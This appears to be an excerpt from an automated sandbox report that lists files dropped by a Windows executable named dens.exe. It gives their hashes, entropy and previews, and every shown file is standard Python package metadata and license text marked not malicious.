                                                                                                                                                                                                                                            SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreBNA2eBKmJozlMHuO:h9Co8FyQjkDYc5tWreBN0n2mH1
                                                                                                                                                                                                                                            MD5:FAADAEDCA9251A90B205C9167578CE91
                                                                                                                                                                                                                                            SHA1:ED1FCABA1DBBF55113ABB419A484F3DF63E7ECFC
                                                                                                                                                                                                                                            SHA-256:CAD1EF5BD340D73E074BA614D26F7DEACA5C7940C3D8C34852E65C4909686C48
                                                                                                                                                                                                                                            SHA-512:1E69C89558FFE39E5C1EBB6728C4F0EB6023563C7A7F31B5417A8EFCC906378D2E2AF7B0E06A66980FBAAB7996AEB2AE1EA3918FDBE5FFCC3F77EA888A68EFBC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to this software is made.under the terms of *both* these licenses..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10174
                                                                                                                                                                                                                                            Entropy (8bit):4.3908324771089084
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLhP:U9vlKM1zJlFvmNz5VrZ
                                                                                                                                                                                                                                            MD5:2EE41112A44FE7014DCE33E26468BA93
                                                                                                                                                                                                                                            SHA1:598F87F072F66E2269DD6919292B2934DBB20492
                                                                                                                                                                                                                                            SHA-256:0D542E0C8804E39AA7F37EB00DA5A762149DC682D7829451287E11B938E94594
                                                                                                                                                                                                                                            SHA-512:27B8C0252EAE50CA3CE02AB7C5670664C0C824E03EB3DA1089F3F0A00D23E648A956BCB9F53645C6D79674A87C4CC86D1085DC335911BE0210D691336B121857
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1344
                                                                                                                                                                                                                                            Entropy (8bit):5.070827944686827
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:fjUnoorbOFFTJJyRrYFTjz796432s4EOkUs8gROF32s3yTtTf413tf9fsZlTHv:fkOFJSrYJR6432svI32s3Stc13tfyTHv
                                                                                                                                                                                                                                            MD5:7BEF9BF4A8E4263634D0597E7BA100B8
                                                                                                                                                                                                                                            SHA1:FDC0E4EABC45522B079DEFF7D03D70528D775DC0
                                                                                                                                                                                                                                            SHA-256:B70E7E9B742F1CC6F948B34C16AA39FFECE94196364BC88FF0D2180F0028FAC5
                                                                                                                                                                                                                                            SHA-512:96C3273D51B83B6AE1AB85FEFB814DCD6C1E60D311D412242405AA429CC860412477CBD6ECE171408DBB85F0C4FD742E3AF20C758015BC48406AA65A1AB6F60A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Copyright (c) Donald Stufft and individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE.DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE.FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL.DAMAGES (INCLUDING, BUT NOT LIM
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3204
                                                                                                                                                                                                                                            Entropy (8bit):4.9859857663557925
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:DRKnOkaMktjaVMxsxCp5QXFfFKiYEvA9TzBnyD:psZfFhgXNG
                                                                                                                                                                                                                                            MD5:3236C0D7091D4A6577FA30E061480CEC
                                                                                                                                                                                                                                            SHA1:F99865B8D3B90AD64A0060F7F2F4C6E4FAEB0A39
                                                                                                                                                                                                                                            SHA-256:5F7A283B75A709FCCD481AEA42379F083D4F3801753365922E6B0732042515D9
                                                                                                                                                                                                                                            SHA-512:A9F0BC43A135732510B98E9C0B7F997D9557A6069352372F1AC3216F0E66FA617D9597990904935D58E5139FB34E17995BFA8B95B90C71997206A2B6955FE867
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: packaging.Version: 24.1.Summary: Core utilities for Python packages.Author-email: Donald Stufft <donald@stufft.io>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classifier: Programming Language :: Python :: 3.13.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2565
                                                                                                                                                                                                                                            Entropy (8bit):5.780503861671858
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:bsnuXksXW2Bsv8VsQ7lEsahOsbs5Jhsde8UogvtJkHpHAfEcysrD5WJeCzESowj:vXrW2s8JsMdVogvtJkJgfksP5qeCzOwj
                                                                                                                                                                                                                                            MD5:88FBF3C6BD08040482212DAD5A8EAB02
                                                                                                                                                                                                                                            SHA1:E7EE66942F7321FB77888D492D57C2EEEA1A5171
                                                                                                                                                                                                                                            SHA-256:38A6898306293627C81E2B2D8A93E5F6857D5F7EDB73F0334E8D9A53DAD53B6E
                                                                                                                                                                                                                                            SHA-512:786AE1F883A999A0939C22A756F90D74CC7F87AAF13F6FFF22D8D962D213A1ECBC6AAE2890A5D7347487824CD0E9EB440A3923F01F938EEF068719DFEEE96554
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:packaging-24.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..packaging-24.1.dist-info/LICENSE,sha256=ytHvW9NA1z4HS6YU0m996spceUDD2MNIUuZcSQlobEg,197..packaging-24.1.dist-info/LICENSE.APACHE,sha256=DVQuDIgE45qn836wDaWnYhSdxoLXgpRRKH4RuTjpRZQ,10174..packaging-24.1.dist-info/LICENSE.BSD,sha256=tw5-m3QvHMb5SLNMFqo5_-zpQZY2S8iP8NIYDwAo-sU,1344..packaging-24.1.dist-info/METADATA,sha256=X3ooO3WnCfzNSBrqQjefCD1POAF1M2WSLmsHMgQlFdk,3204..packaging-24.1.dist-info/RECORD,,..packaging-24.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..packaging-24.1.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..packaging/__init__.py,sha256=dtw2bNmWCQ9WnMoK3bk_elL1svSlikXtLpZhCFIB9SE,496..packaging/__pycache__/__init__.cpython-312.pyc,,..packaging/__pycache__/_elffile.cpython-312.pyc,,..packaging/__pycache__/_manylinux.cpython-312.pyc,,..packaging/__pycache__/_musllinux.cpython-312.pyc,,..packaging/__pycache__/_parser.cpython-312.pyc,,
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                            Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                                            MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                                            SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                                            SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                                            SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11429
                                                                                                                                                                                                                                            Entropy (8bit):5.039575520713946
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:n9x/tlCtlsaCUpVQ7yHwgNF8NFvWVDM1RnzadSibNTTh+fOnnxa6jlES4h8a8KAH:3/tlCfsqpq7ydZzM0dGiCbvHcjNj61TA
                                                                                                                                                                                                                                            MD5:12306075DF09A0DBB93315FADDDF73FB
                                                                                                                                                                                                                                            SHA1:1AC8A3679AFCFEEC0BA00851F5F8095DD1B060CD
                                                                                                                                                                                                                                            SHA-256:CE6B227B4D46D4CB57474C2022FE57A557933BB89DAF4596BDF9B12AC296B869
                                                                                                                                                                                                                                            SHA-512:BA0A72B888A14F82FD44FB103C01EF0900B5302F18E986A8264A9A08AB77D1C655C392374FD7B0A98BEF9B9511F6EC78AF3EF8936091C80A0B5364F7A53DC20A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.3.Name: platformdirs.Version: 4.2.2.Summary: A small Python package for determining appropriate platform-specific dirs, e.g. a `user data dir`..Project-URL: Documentation, https://platformdirs.readthedocs.io.Project-URL: Homepage, https://github.com/platformdirs/platformdirs.Project-URL: Source, https://github.com/platformdirs/platformdirs.Project-URL: Tracker, https://github.com/platformdirs/platformdirs/issues.Maintainer-email: Bern.t G.bor <gaborjbernat@gmail.com>, Julian Berman <Julian@GrayVines.com>, Ofek Lev <oss@ofek.dev>, Ronny Pfannschmidt <opensource@ronnypfannschmidt.de>.License-Expression: MIT.License-File: LICENSE.Keywords: appdirs,application,cache,directory,log,user.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1642
                                                                                                                                                                                                                                            Entropy (8bit):5.780720255872038
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:bn/2zDzoobEsJhfPWcs013+pj456szN6lnhta57WJ+guQg4:bnuXcob5Jhfucs+d49hta9WJ+g1X
                                                                                                                                                                                                                                            MD5:0E141A28570FC62974FC5CEADFE808E3
                                                                                                                                                                                                                                            SHA1:7B92561C5BBBA83D6E16A1C7B195089ACA1766AF
                                                                                                                                                                                                                                            SHA-256:4C211D76D42ED40EFC3ACFCC866D8912A718AFBCA2B7E51849442366D6E99FE8
                                                                                                                                                                                                                                            SHA-512:830721C18A35AECD1EFB81A5FAAF8AC0EA02428EDC5B294458556343788D894B76035F1E661214D975DF2A64DC8C3D6AAA7A53A99BE64B9413B6A5D89D549F9D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:platformdirs-4.2.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..platformdirs-4.2.2.dist-info/METADATA,sha256=zmsie01G1MtXR0wgIv5XpVeTO7idr0WWvfmxKsKWuGk,11429..platformdirs-4.2.2.dist-info/RECORD,,..platformdirs-4.2.2.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..platformdirs-4.2.2.dist-info/WHEEL,sha256=zEMcRr9Kr03x1ozGwg5v9NQBKn3kndp6LSoSlVg-jhU,87..platformdirs-4.2.2.dist-info/licenses/LICENSE,sha256=KeD9YukphQ6G6yjD_czwzv30-pSHkBHP-z0NS-1tTbY,1089..platformdirs/__init__.py,sha256=EMGE8qeHRR9CzDFr8kL3tA8hdZZniYjXBVZd0UGTWK0,22225..platformdirs/__main__.py,sha256=HnsUQHpiBaiTxwcmwVw-nFaPdVNZtQIdi1eWDtI-MzI,1493..platformdirs/__pycache__/__init__.cpython-312.pyc,,..platformdirs/__pycache__/__main__.cpython-312.pyc,,..platformdirs/__pycache__/android.cpython-312.pyc,,..platformdirs/__pycache__/api.cpython-312.pyc,,..platformdirs/__pycache__/macos.cpython-312.pyc,,..platformdirs/__pycache__/unix.cpython-312.pyc,,..platformdirs/__p
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):87
                                                                                                                                                                                                                                            Entropy (8bit):4.730668933656452
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeXAaCTR73RP+tPCCfA5I:Rt2PFRWBB3
                                                                                                                                                                                                                                            MD5:8895639B8515B3094302B59E28AFB562
                                                                                                                                                                                                                                            SHA1:FBD4DA759EA5BEB65AE820DFBC47F9B569E89519
                                                                                                                                                                                                                                            SHA-256:CC431C46BF4AAF4DF1D68CC6C20E6FF4D4012A7DE49DDA7A2D2A1295583E8E15
                                                                                                                                                                                                                                            SHA-512:B53C0978DAD2A7195058ABC7B7D20A229EC617BDDBB364D8ED2354F37D5071208735774350F9FBBA5C804BEFCEFE71C27BC5E468E12899DF4687189C468785A0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: hatchling 1.24.2.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1089
                                                                                                                                                                                                                                            Entropy (8bit):5.119723466133474
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:VrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:VaJHlxE3dQHOs5exm3ogFh
                                                                                                                                                                                                                                            MD5:EA4F5A41454746A9ED111E3D8723D17A
                                                                                                                                                                                                                                            SHA1:F511A8A63AF8C6E36004B593478436BBC560EE0C
                                                                                                                                                                                                                                            SHA-256:29E0FD62E929850E86EB28C3FDCCF0CEFDF4FA94879011CFFB3D0D4BED6D4DB6
                                                                                                                                                                                                                                            SHA-512:CACA68A5589CA2EAB7C0D74BA5D2B25E3367B9902DFC7578BBA911AC8F8BF1C3A13F25E663C5B6B19BA71BF611943E23F4D0A99BE92A8F7D7FF60732DC3DD409
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MIT License..Copyright (c) 2010-202x The platformdirs developers..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1072
                                                                                                                                                                                                                                            Entropy (8bit):5.10135495500641
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:f9rmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:1aJHlxE3dQHOs5exm3ogFh
                                                                                                                                                                                                                                            MD5:AAAAF0879D17DF0110D1AA8C8C9F46F5
                                                                                                                                                                                                                                            SHA1:9DA6CA26337A886FB3E8D30EFD4AEDA623DC9ADE
                                                                                                                                                                                                                                            SHA-256:B80816B0D530B8ACCB4C2211783790984A6E3B61922C2B5EE92F3372AB2742FE
                                                                                                                                                                                                                                            SHA-512:EECD0C29FEBF51ADEFB02F970E66EFE7E24D573686DFDB3BEEA63CEFEA012A79CE3C49A899B4F26E9B67DC27176B397F6041909227281F9866BEEDC97389095C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MIT License..Copyright (c) 2021 Taneli Hukkinen..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CON
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8875
                                                                                                                                                                                                                                            Entropy (8bit):4.884349533695185
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:h15VsahrDzoGlmLxUJyLIPXR/yrKK3Trclclg2pj4VRR6V8wNVonQd:3swrAamWuIPA2K3v2g
                                                                                                                                                                                                                                            MD5:CBBF7047A51FEDA58386E86182B85B8A
                                                                                                                                                                                                                                            SHA1:D3EA3BDA227794AE35FE7FFC5BD6E5FA2A5EF250
                                                                                                                                                                                                                                            SHA-256:CCF0DC78A98FC0918B5AD67292B1E2C4BED65575A6246CD9D63C914F9942A0F2
                                                                                                                                                                                                                                            SHA-512:A994914F1676790730C6BDACA26FE5F1B18BA9A3B9F0D24D708C722424DED255360A0CC88E239C6BFE467BD2763DF7339BB6B760AB090FAE474A7C9C8AFA8948
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: tomli.Version: 2.0.1.Summary: A lil' TOML parser.Keywords: toml.Author-email: Taneli Hukkinen <hukkin@users.noreply.github.com>.Requires-Python: >=3.7.Description-Content-Type: text/markdown.Classifier: License :: OSI Approved :: MIT License.Classifier: Operating System :: MacOS.Classifier: Operating System :: Microsoft :: Windows.Classifier: Operating System :: POSIX :: Linux.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation :: PyPy.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Classifier: Typing :: Typed.Project-URL: Changelog, https://github.com/hukkin/tomli/blob/master/CHANGELOG.md.Project-URL:
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):999
                                                                                                                                                                                                                                            Entropy (8bit):5.89030761653127
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4n/2zDRv53Pb4EsJWc6QtD8r8N8bh8WNdop2+oM8+kzAL5+1:4nuXR1Pb45JWc6QmIebKWcpHoM8JMLy
                                                                                                                                                                                                                                            MD5:D5FAB61E3DB6B54B51FBA607865C195B
                                                                                                                                                                                                                                            SHA1:B94D9126E8FC9D5F29FAFBB67F068E2D111D17FC
                                                                                                                                                                                                                                            SHA-256:0CB9F9A451A1E365AC54B4C88662E1DA0CB54A72D16A5258FB0ABFF9D3E1C022
                                                                                                                                                                                                                                            SHA-512:ABD3EF61D8D578C1DE609560A6985503E60BD53F90DCFF54EBEE23714D9CD88DBA4036ED19B24EC62B8432550311894FCC47BDCCD7CE4DCDE82518F4E02E123C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:tomli-2.0.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..tomli-2.0.1.dist-info/LICENSE,sha256=uAgWsNUwuKzLTCIReDeQmEpuO2GSLCte6S8zcqsnQv4,1072..tomli-2.0.1.dist-info/METADATA,sha256=zPDceKmPwJGLWtZykrHixL7WVXWmJGzZ1jyRT5lCoPI,8875..tomli-2.0.1.dist-info/RECORD,,..tomli-2.0.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..tomli-2.0.1.dist-info/WHEEL,sha256=jPMR_Dzkc4X4icQtmz81lnNY_kAsfog7ry7qoRvYLXw,81..tomli/__init__.py,sha256=JhUwV66DB1g4Hvt1UQCVMdfCu-IgAV8FXmvDU9onxd4,396..tomli/__pycache__/__init__.cpython-312.pyc,,..tomli/__pycache__/_parser.cpython-312.pyc,,..tomli/__pycache__/_re.cpython-312.pyc,,..tomli/__pycache__/_types.cpython-312.pyc,,..tomli/_parser.py,sha256=g9-ENaALS-B8dokYpCuzUFalWlog7T-SIYMjLZSWrtM,22633..tomli/_re.py,sha256=dbjg5ChZT23Ka9z9DHOXfdtSpPwUfdgMXnj8NOoly-w,2943..tomli/_types.py,sha256=-GTG2VUqkpxwMqzmVO4F7ybKddIbAnuAHXfmWQcTi3Q,254..tomli/py.typed,sha256=8PjyZ1aVoQpRVvt71muvuq5qE-jTFZkK-GLHkhdebmc,26..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                            Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX/QFMthP+tPCCfA5I:Rt1QqDWBB3
                                                                                                                                                                                                                                            MD5:FF39892A240316BD62B5832C03D504BC
                                                                                                                                                                                                                                            SHA1:3883FC4406CC9A73BE0B839C1A0C31D3DDD64829
                                                                                                                                                                                                                                            SHA-256:8CF311FC3CE47385F889C42D9B3F35967358FE402C7E883BAF2EEAA11BD82D7C
                                                                                                                                                                                                                                            SHA-512:B2E57D9C81BBFB7364B8216FC086B8F73C2F2B537E300FB250EFB7972E3908F77A3D504363676C50A195D307822C69EE9B689DE6C48A4E6B8A6BA89A5A99AC32
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: flit 3.6.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1130
                                                                                                                                                                                                                                            Entropy (8bit):5.118590213496374
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:qt4rWHvH0yPP3Gt6Hw1hP9QHmsUv48OV/+dho3BoqxFB:/S/lPvKhlQHms5QK3WmFB
                                                                                                                                                                                                                                            MD5:F0E423EEA5C91E7AA21BDB70184B3E53
